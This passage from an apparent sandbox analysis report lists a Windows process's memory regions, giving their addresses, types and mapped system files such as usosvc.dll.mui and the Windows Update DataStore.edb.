1 entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 1412 start_va = 0x3e80000 end_va = 0x3f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 1413 start_va = 0x3f80000 end_va = 0x3f89fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "combase.dll.mui" filename = "\\Windows\\System32\\en-US\\combase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\combase.dll.mui") Region: id = 1414 start_va = 0x3f90000 end_va = 0x3fa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f90000" filename = "" Region: id = 1415 start_va = 0x3fb0000 end_va = 0x3fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fb0000" filename = "" Region: id = 1416 start_va = 0x3fc0000 end_va = 0x3fc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\usosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usosvc.dll.mui") Region: id = 1417 start_va = 0x3fd0000 end_va = 0x3fd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 1418 start_va = 0x3fe0000 end_va = 0x3fe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fe0000" filename = "" Region: id = 1419 start_va = 0x3ff0000 end_va = 0x3ff3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ff0000" filename = "" Region: id = 1420 start_va = 0x4000000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 1421 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1422 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 1423 start_va = 0x4400000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1424 start_va = 0x4480000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 1425 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1426 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1427 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1428 start_va = 0x4800000 end_va = 0x487ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1429 start_va = 0x4880000 end_va = 0x497ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 1430 start_va = 0x4980000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004980000" filename = "" Region: id = 1431 start_va = 0x4a00000 end_va = 0x4bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 1432 start_va = 0x4c00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 1433 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 1434 start_va = 0x4f00000 end_va = 0x4f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 1435 start_va = 0x4f90000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f90000" filename = "" Region: id = 1436 start_va = 0x5090000 end_va = 0x518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 1437 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005190000" filename = "" Region: id = 1438 start_va = 0x51a0000 end_va = 0x51affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000051a0000" filename = "" Region: id = 1439 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000051b0000" filename = "" Region: id = 1440 start_va = 0x51c0000 end_va = 0x51cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000051c0000" filename = "" Region: id = 1441 start_va = 0x51d0000 end_va = 0x51dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000051d0000" filename = "" Region: id = 1442 start_va = 0x51e0000 end_va = 0x51effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000051e0000" filename = "" Region: id = 1443 start_va = 0x51f0000 end_va = 0x526ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051f0000" filename = "" Region: id = 1444 start_va = 0x5270000 end_va = 0x5341fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005270000" filename = "" Region: id = 1445 start_va = 0x5350000 end_va = 0x535ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005350000" filename = "" Region: id = 1446 start_va = 0x5360000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005360000" filename = "" Region: id = 1447 start_va = 0x5370000 end_va = 0x537ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005370000" filename = "" Region: id = 1448 start_va = 0x5380000 end_va = 0x538ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005380000" filename = "" Region: id = 1449 start_va = 0x5390000 end_va = 0x539ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005390000" filename = "" Region: id = 1450 start_va = 0x53a0000 end_va = 0x53affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000053a0000" filename = "" Region: id = 1451 start_va = 0x53b0000 end_va = 0x53c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "esent.dll.mui" filename = "\\Windows\\System32\\en-US\\ESENT.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\esent.dll.mui") Region: id = 1452 start_va = 0x53d0000 end_va = 0x53d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000053d0000" filename = "" Region: id = 1453 start_va = 0x53e0000 end_va = 0x53e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000053e0000" filename = "" Region: id = 1454 start_va = 0x53f0000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000053f0000" filename = "" Region: id = 1455 start_va = 0x5400000 end_va = 0x55fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 1456 start_va = 0x5600000 end_va = 0x560ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1457 start_va = 0x5610000 end_va = 0x561ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1458 start_va = 0x5620000 end_va = 0x562ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1459 start_va = 0x5630000 end_va = 0x563ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1460 start_va = 0x5640000 end_va = 0x564ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1461 start_va = 0x5650000 end_va = 0x565ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1462 start_va = 0x5660000 end_va = 0x566ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1463 start_va = 0x5670000 end_va = 0x567ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1464 start_va = 0x5680000 end_va = 0x568ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1465 start_va = 0x5690000 end_va = 0x569ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1466 start_va = 0x56a0000 end_va = 0x56affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1467 start_va = 0x56b0000 end_va = 0x56bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1468 start_va = 0x56c0000 end_va = 0x56cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1469 start_va = 0x56d0000 end_va = 0x56dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1470 start_va = 0x56e0000 end_va = 0x56effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1471 start_va = 0x56f0000 end_va = 0x56fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1472 start_va = 0x5700000 end_va = 0x57fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 1473 start_va = 0x5800000 end_va = 0x58fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 1474 start_va = 0x5900000 end_va = 0x59d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005900000" filename = "" Region: id = 1475 start_va = 0x59e0000 end_va = 0x59e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059e0000" filename = "" Region: id = 1476 start_va = 0x59f0000 end_va = 0x59f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059f0000" filename = "" Region: id = 1477 start_va = 0x5a00000 end_va = 0x5afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 1478 start_va = 0x5b00000 end_va = 0x5b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b00000" filename = "" Region: id = 1479 start_va = 0x5b20000 end_va = 0x5b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b20000" filename = "" Region: id = 1480 start_va = 0x5b80000 end_va = 0x5b81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b80000" filename = "" Region: id = 1481 start_va = 0x5b90000 end_va = 0x5b90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b90000" filename = "" Region: id = 1482 start_va = 0x5ba0000 end_va = 0x5c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ba0000" filename = "" Region: id = 1483 start_va = 0x5c20000 end_va = 0x5c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1484 start_va = 0x5c30000 end_va = 0x5c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c30000" filename = "" Region: id = 1485 start_va = 0x5c40000 end_va = 0x5c4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1486 start_va = 0x5c50000 end_va = 0x5c5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1487 start_va = 0x5c60000 end_va = 0x5c6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1488 start_va = 0x5c70000 end_va = 0x5c7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1489 start_va = 0x5c80000 end_va = 0x5c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c80000" filename = "" Region: id = 1490 start_va = 0x5c90000 end_va = 0x5c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c90000" filename = "" Region: id = 1491 start_va = 0x5ca0000 end_va = 0x5caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ca0000" filename = "" Region: id = 1492 start_va = 0x5cb0000 end_va = 0x5cbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1493 start_va = 0x5cc0000 end_va = 0x5cc3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cc0000" filename = "" Region: id = 1494 start_va = 0x5cd0000 end_va = 0x5cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cd0000" filename = "" Region: id = 1495 start_va = 0x5ce0000 end_va = 0x5ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ce0000" filename = "" Region: id = 1496 start_va = 0x5de0000 end_va = 0x5deffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1497 start_va = 0x5df0000 end_va = 0x5dfffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1498 start_va = 0x5e00000 end_va = 0x5e0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1499 start_va = 0x5e10000 end_va = 0x5e1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1500 start_va = 0x5e20000 end_va = 0x5e2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1501 start_va = 0x5e30000 end_va = 0x5e3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1502 start_va = 0x5e40000 end_va = 0x5e4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1503 start_va = 0x5e50000 end_va = 0x5e5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1504 start_va = 0x5e60000 end_va = 0x5e6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1505 start_va = 0x5e70000 end_va = 0x5e7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1506 start_va = 0x5e80000 end_va = 0x5e8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1507 start_va = 0x5e90000 end_va = 0x5e9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1508 start_va = 0x5ea0000 end_va = 0x5eaffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1509 start_va = 0x5eb0000 end_va = 0x5ebffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1510 start_va = 0x5ec0000 end_va = 0x5ecffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1511 start_va = 0x5ed0000 end_va = 0x5edffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1512 start_va = 0x5ee0000 end_va = 0x5eeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1513 start_va = 0x5ef0000 end_va = 0x5efffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1514 start_va = 0x5f00000 end_va = 0x5f0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1515 start_va = 0x5f10000 end_va = 0x5f1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1516 start_va = 0x5f20000 end_va = 0x5f2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1517 start_va = 0x5f30000 end_va = 0x5f3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1518 start_va = 0x5f40000 end_va = 0x5f4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1519 start_va = 0x5f50000 end_va = 0x5f5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1520 start_va = 0x5f60000 end_va = 0x5f6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1521 start_va = 0x5f70000 end_va = 0x5f7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1522 start_va = 0x5f80000 end_va = 0x5f8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1523 start_va = 0x5f90000 end_va = 0x5f9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1524 start_va = 0x5fa0000 end_va = 0x5faffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1525 start_va = 0x5fb0000 end_va = 0x5fbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1526 start_va = 0x5fc0000 end_va = 0x5fcffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1527 start_va = 0x5fd0000 end_va = 0x5fdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1528 start_va = 0x5fe0000 end_va = 0x5feffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1529 start_va = 0x5ff0000 end_va = 0x5ffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1530 start_va = 0x6000000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006000000" filename = "" Region: id = 1531 start_va = 0x6200000 end_va = 0x71fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 1532 start_va = 0x7200000 end_va = 0x73fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007200000" filename = "" Region: id = 1533 start_va = 0x7400000 end_va = 0x74fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007400000" filename = "" Region: id = 1534 start_va = 0x7500000 end_va = 0x75fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007500000" filename = "" Region: id = 1535 start_va = 0x7600000 end_va = 0x760ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1536 start_va = 0x7610000 end_va = 0x761ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1537 start_va = 0x7620000 end_va = 0x762ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1538 start_va = 0x7630000 end_va = 0x763ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1539 start_va = 0x7640000 end_va = 0x764ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1540 start_va = 0x7650000 end_va = 0x765ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1541 start_va = 0x7660000 end_va = 0x766ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1542 start_va = 0x7670000 end_va = 0x767ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1543 start_va = 0x7680000 end_va = 0x768ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1544 start_va = 0x7690000 end_va = 0x769ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1545 start_va = 0x76a0000 end_va = 0x76affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1546 start_va = 0x76b0000 end_va = 0x76bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1547 start_va = 0x76c0000 end_va = 0x76c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 1548 start_va = 0x76d0000 end_va = 0x76e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 1549 start_va = 0x76f0000 end_va = 